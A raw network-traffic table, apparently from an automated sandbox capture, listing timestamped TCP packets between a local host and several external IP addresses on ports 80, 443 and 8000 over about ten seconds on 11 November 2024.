                                                                                                                                                                                                          Nov 11, 2024 18:24:27.462496996 CET6320880192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.468142033 CET806320875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.468198061 CET6320880192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.548175097 CET4970780192.168.2.8154.212.231.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.553141117 CET8049707154.212.231.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.681200027 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.681237936 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.681371927 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.685233116 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.685246944 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.694257021 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.694288969 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.694355011 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.694926023 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.694935083 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.808698893 CET806320985.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.808784008 CET6320980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.808945894 CET6320980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.813857079 CET806320985.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.871728897 CET8049737199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.871800900 CET4973780192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.878686905 CET806321023.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.878726959 CET806321023.253.46.64192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.878793001 CET6321080192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.878793001 CET6321080192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.879126072 CET6321080192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.879126072 CET6321080192.168.2.823.253.46.64
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.912127972 CET8049707154.212.231.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.912688971 CET4970780192.168.2.8154.212.231.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.127870083 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.127943039 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.132170916 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.132179976 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.132531881 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.132671118 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.133192062 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.140571117 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.140630960 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.141036034 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.141041040 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.141318083 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.141321898 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.179325104 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.359765053 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.359817982 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.359823942 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.359839916 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.359862089 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.359875917 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.359896898 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.359905005 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.359915972 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.359956026 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.359956026 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.359965086 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.359981060 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.360008001 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.442150116 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.442225933 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.442411900 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.442461967 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.444144011 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.444152117 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.444206953 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.444219112 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.444242001 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.444250107 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.444274902 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.444298983 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.444303989 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.444363117 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.445000887 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.445067883 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.522281885 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.522316933 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.522351027 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.522360086 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.522404909 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.523040056 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.523071051 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.523097038 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.523102999 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.523143053 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.523155928 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.523189068 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.523194075 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.523226976 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.523324013 CET63212443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.523339033 CET4436321275.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944029093 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944078922 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944108963 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944148064 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944149971 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944175005 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944195032 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944216967 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944221020 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944642067 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944668055 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944745064 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944749117 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944768906 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.944782019 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.946918011 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.947220087 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.966494083 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.966603994 CET44363211188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:28.966691017 CET63211443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:29.473287106 CET4970980192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:29.478147984 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:29.830542088 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:29.830755949 CET4970980192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:29.838025093 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:29.838063955 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:29.838279009 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:29.838542938 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:29.838555098 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:30.289208889 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:30.289292097 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:30.291131020 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:30.291142941 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:30.291471004 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:30.291523933 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:30.291867018 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:30.339337111 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.123941898 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124001980 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124036074 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124046087 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124078989 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124108076 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124108076 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124123096 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124123096 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124134064 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124150991 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124181032 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124186993 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124248028 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124253035 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124288082 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124306917 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124341965 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124408007 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124560118 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124566078 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124675989 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124697924 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124707937 CET44363213188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124731064 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.124749899 CET63213443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.273379087 CET4972680192.168.2.8103.150.10.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.278199911 CET8049726103.150.10.48192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.294924974 CET4972380192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.300415039 CET8049723188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.543575048 CET8049726103.150.10.48192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.543636084 CET4972680192.168.2.8103.150.10.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.560908079 CET497288000192.168.2.8106.15.232.163
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.566257000 CET800049728106.15.232.163192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.699342012 CET8049723188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.699420929 CET4972380192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.829479933 CET800049728106.15.232.163192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.832148075 CET497288000192.168.2.8106.15.232.163
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.527580023 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.527621984 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.527687073 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.528441906 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.528451920 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.559969902 CET4972680192.168.2.8103.150.10.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.564889908 CET8049726103.150.10.48192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.831363916 CET8049726103.150.10.48192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.831482887 CET4972680192.168.2.8103.150.10.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.834279060 CET497288000192.168.2.8106.15.232.163
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.839122057 CET800049728106.15.232.163192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.966254950 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.966327906 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.968451977 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.968472004 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.968717098 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.968770027 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.969131947 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:33.011336088 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:33.137892008 CET800049728106.15.232.163192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:33.138672113 CET497288000192.168.2.8106.15.232.163
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.530486107 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.530545950 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.530577898 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.530581951 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.530600071 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.530611038 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.530644894 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.530648947 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.530684948 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.530689001 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.530899048 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.530904055 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.530940056 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.531090021 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.531162977 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.531173944 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.531213999 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.531264067 CET44361823188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.531310081 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.531336069 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.531358004 CET61823443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.581680059 CET4972380192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.587210894 CET8049723188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.922399998 CET8049723188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.922466993 CET4972380192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.954051971 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.954107046 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.954220057 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.958137989 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.958167076 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:35.414349079 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:35.414441109 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:35.427784920 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:35.427809000 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:35.428097010 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:35.428165913 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:35.428626060 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:35.471338034 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952059031 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952127934 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952147007 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952192068 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952248096 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952303886 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952311993 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952322006 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952374935 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952380896 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952390909 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952461004 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952501059 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952517986 CET44361824188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952533007 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:36.952580929 CET61824443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.015883923 CET6182580192.168.2.8103.224.182.252
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.017805099 CET4973580192.168.2.8154.85.183.50
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.021230936 CET8061825103.224.182.252192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.021606922 CET6182580192.168.2.8103.224.182.252
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.022259951 CET6182580192.168.2.8103.224.182.252
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.022841930 CET8049735154.85.183.50192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.027482986 CET8061825103.224.182.252192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.071378946 CET6182680192.168.2.8103.224.212.210
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.076574087 CET8061826103.224.212.210192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.076643944 CET6182680192.168.2.8103.224.212.210
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.076800108 CET6182680192.168.2.8103.224.212.210
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.082379103 CET8061826103.224.212.210192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.303112984 CET8049735154.85.183.50192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.303196907 CET4973580192.168.2.8154.85.183.50
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.307270050 CET8063205199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.307332993 CET6320580192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.565736055 CET4973580192.168.2.8154.85.183.50
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.570697069 CET8049735154.85.183.50192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.589415073 CET8061825103.224.182.252192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.589468956 CET6182580192.168.2.8103.224.182.252
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.593115091 CET6182580192.168.2.8103.224.182.252
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.593374968 CET4973680192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.593703032 CET6182780192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.598324060 CET804973664.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.598526001 CET8061825103.224.182.252192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.598813057 CET806182764.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.598886967 CET6182580192.168.2.8103.224.182.252
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.598946095 CET6182780192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.599100113 CET6182780192.168.2.864.190.63.136
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.603904009 CET806182764.190.63.136192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.627923965 CET8061826103.224.212.210192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.628005028 CET6182680192.168.2.8103.224.212.210
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.633452892 CET6182680192.168.2.8103.224.212.210
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.638556004 CET4973780192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.638727903 CET8061826103.224.212.210192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.638792992 CET6182680192.168.2.8103.224.212.210
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.639049053 CET6182880192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.643485069 CET8049737199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.644629955 CET8061828199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.644714117 CET6182880192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.645051003 CET6182880192.168.2.8199.59.243.227
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.650978088 CET8061828199.59.243.227192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.871067047 CET8049735154.85.183.50192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.871156931 CET4973580192.168.2.8154.85.183.50
